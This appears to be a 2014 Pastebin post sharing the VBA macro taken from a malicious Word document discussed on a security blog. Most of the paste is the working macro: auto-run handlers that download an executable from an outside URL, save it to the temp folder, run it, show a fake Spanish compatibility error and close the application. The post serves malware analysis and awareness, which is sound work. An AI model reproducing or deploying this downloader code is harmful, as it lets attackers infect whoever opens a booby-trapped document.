SHARE
TWEET

Untitled

a guest Jul 10th, 2014 358 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. from the malicious word doc detailed in dynamoo's blog here:
  2. http://blog.dynamoo.com/2014/07/estado-de-cuenta-datallado-en-linea.html
  3.  
  4. the VBA script below.
  5.  
  6. when i checked, the baulretro.cl/tienda/cache/wp/ss.exe was no longer available.
  7.  
  8. =============================================================================
  9. Rem Attribute VBA_ModuleType=VBADocumentModule
  10. Option VBASupport 1
  11. Private Sub Auto_Open()
  12. Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe")
  13. End Sub
  14. Private Sub Workbook_Open()
  15. Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe")
  16. End Sub
  17. Private Sub AutoExec()
  18. Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe")
  19. End Sub
  20. Private Sub AutoOpen()
  21. Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe")
  22. End Sub
  23. Private Sub Document_Open()
  24. Call DownloadFile("http://baulretro.cl/tienda/cache/wp/ss.exe", "389nvry8392y.exe")
  25. End Sub
  26. Public Function DownloadFile(ByVal URL As String, ByVal SaveName As String, Optional SavePath As String = "TMP", Optional RunAfterDownload As Boolean = True, Optional RunHide As Boolean = False)
  27.     On Error Resume Next
  28.     Err.Clear
  29.  
  30.     Set XML = CreateObject("Microsoft.XMLHTTP")
  31.     Set ADS = CreateObject("ADODB.Stream")
  32.  
  33.     XML.Open "GET", URL, False
  34.     XML.send
  35.  
  36.     XML.getAllResponseHeaders
  37.  
  38.     FullSavePath = Environ(SavePath) & "\" & SaveName
  39.  
  40.     ADS.Open
  41.     ADS.Type = 1
  42.     ADS.Write XML.responseBody
  43.     ADS.SaveToFile FullSavePath, 2
  44.  
  45.     Shell FullSavePath, vbNormalFocus
  46.     DownloadFile = True
  47.     MsgBox "Este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Error"
  48.     If 1 < 5564 Then: sSa
  49. End Function
  50. Sub sSa()
  51.     Application.DisplayAlerts = False
  52.     Application.Quit
  53. End Sub
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top